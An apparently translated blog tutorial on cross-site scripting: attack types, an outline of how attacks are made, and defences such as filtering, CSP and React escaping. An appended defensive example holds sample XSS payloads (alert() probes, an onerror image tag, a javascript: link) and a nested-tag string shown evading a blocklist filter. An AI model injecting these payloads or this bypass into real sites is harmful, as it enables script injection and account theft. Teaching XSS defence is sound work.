On April 30, 2011, renren.com suffered an XSS attack. On June 28, 2011, Sina Weibo was hit by an XSS attack: once a user was affected, their account automatically sent poisoned private messages and microblog posts to their followers, and some of those followers were infected in turn after clicking, forming a vicious circle.

I. Introduction to XSS attacks

1. Introduction

XSS (Cross-Site Scripting) attacks exploit vulnerabilities left during the development of Web pages to insert malicious script code into a page. When users browse the page, the embedded script is executed, achieving the attacker's purpose against those users.

2. Harm

According to statistics from OWASP (the world's best-known Web security and database security research organization) in recent years, XSS accounts for 22% of all Web attacks, ranking it first among all Web threats. Its consequences include:

  • Traffic hijacking
  • Obtaining users' cookie information and stealing accounts
  • Tampering with or deleting page information
  • Combining with CSRF attacks to carry out further attacks
  • and so on

II. XSS attack types

1. Stored XSS

  • Stored XSS is triggered when a user browses the page where the payload was saved

2. Reflected XSS

  • Reflected XSS has to be triggered by tricking the user into opening a crafted link (Zhihu and JD.com escape their output; it would be triggered if there were no escaping)

III. XSS attack process

1. Look for vulnerabilities

  • Message board systems
  • Mail systems
  • Comment systems
  • Rich text editors

These are all "hot spots" for XSS attacks because they all have something in common:

2. Construct the attack code

3. Inject the code

  • PS: Don't try this, the vulnerability has been fixed
  • Use Postman to modify the submitted data and simulate the request
  • The whole process, up to verifying whether the attack is effective, is summarized as follows:

IV. XSS prevention

1. Special character filtering

Tags, attributes and constructs that need to be filtered or escaped:

    <script></script>
    <style></style>
    a, href | events
    img src | events
    style="width: expression(xxx)"

It is recommended to use the xss npm module: jsxss.com/zh/index.ht…

    import xss from 'xss';
    // tags that are not on the module's whitelist are escaped rather than kept
    const html = xss('<script>alert("xss")</script>');

2. Introducing CSP

Content Security Policy is essentially a whitelist system: the developer tells the client explicitly which external resources may be loaded and executed, which greatly improves the security of the page.

CSP does not prevent XSS itself; it limits the further harm an XSS can do once a payload is on the page. For more information about CSP, see www.w3.org/TR/CSP1/

3. XSS and React

JSX prevents injection attacks

  • By default, React DOM escapes any values embedded in JSX before rendering them. Thus it ensures that you can never inject anything that's not explicitly written in your application. Everything is converted to a string before being rendered. This helps prevent XSS attacks. facebook.github.io/react/docs/…
  • However, this is not absolute: when injecting HTML through dangerouslySetInnerHTML you must still filter special characters yourself.

        // the string is inserted as raw HTML, so it must be sanitized before it gets here
        <div dangerouslySetInnerHTML={{ __html: `<script>alert('xss')</script>` }} />
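As an added example (not code from the original article or from React), the following compares the blocklist-style special-character filtering described in section IV.1 with the entity escaping React applies to JSX values by default; the sample inputs and helper names are constructed for this illustration.

```javascript
// Added example, not code from the original article: compares the
// blocklist-style special-character filtering described above with
// entity escaping, the conversion React DOM applies to JSX values.
const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a value for use as HTML text or inside a quoted attribute;
// no tag can form, so the browser shows the input as literal text.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Blocklist filter that strips only the patterns the article lists:
// <script>, <style>, on* event handlers and CSS expression().
function blocklistFilter(html) {
  return html
    .replace(/<\/?script[^>]*>/gi, '')
    .replace(/<\/?style[^>]*>/gi, '')
    .replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '')
    .replace(/expression\s*\([^)]*\)/gi, '');
}

// Heuristic check: does raw markup a browser could execute remain?
// (script tag, inline event handler, or javascript: URL in href/src)
function hasExecutableMarkup(html) {
  return /<script\b/i.test(html)
    || /<[^>]+\son\w+\s*=/i.test(html)
    || /<[^>]+\s(href|src)\s*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed sample inputs of the kind a comment field receives;
// none is taken from a real site.
const SAMPLES = [
  '<script>alert("xss")</script>',
  '<img src=x onerror=alert(1)>',
  '<a href="javascript:alert(1)">click</a>',
  '<scr<script>ipt>alert(1)</script>',
];

// Run both defences over each sample and report whether the output
// still carries executable markup.
function compareDefences(samples = SAMPLES) {
  return samples.map((raw) => {
    const filtered = blocklistFilter(raw);
    const escaped = escapeHtml(raw);
    return { raw, filtered, filteredSafe: !hasExecutableMarkup(filtered),
             escaped, escapedSafe: !hasExecutableMarkup(escaped) };
  });
}
```

Note that stripping is not idempotent: the nested `<scr<script>ipt>` sample comes out of the blocklist filter as a working script tag, while escaping neutralises every sample.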